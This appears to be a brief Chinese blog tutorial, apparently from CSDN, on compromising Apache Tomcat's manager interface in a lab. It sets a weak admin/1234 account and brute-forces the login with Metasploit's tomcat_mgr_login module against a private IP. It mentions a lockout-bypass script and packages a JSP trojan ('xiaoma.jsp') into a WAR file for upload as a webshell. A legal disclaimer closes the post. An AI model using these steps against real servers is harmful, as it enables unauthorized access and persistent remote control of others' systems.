修改tomcat目录下的conf/tomcat-users.xml文件开启管理后台口令认证
<role rolename="manager-gui"/>
<user username="admin" password="1234" roles="manager-gui"/>
use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run
注意:tomcat默认每个账号登陆5次失败后,账户就会被锁定
有绕过防爆机制的python脚本,留言
jar -cvf xiaoma.war "xiaoma.jsp"
//jar -cvf 制作的war包文件名 木马的路径
csdn-Metasploit爆破Tomcat弱口令和漏洞利用
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !
手机扫一扫
移动阅读更方便
你可能感兴趣的文章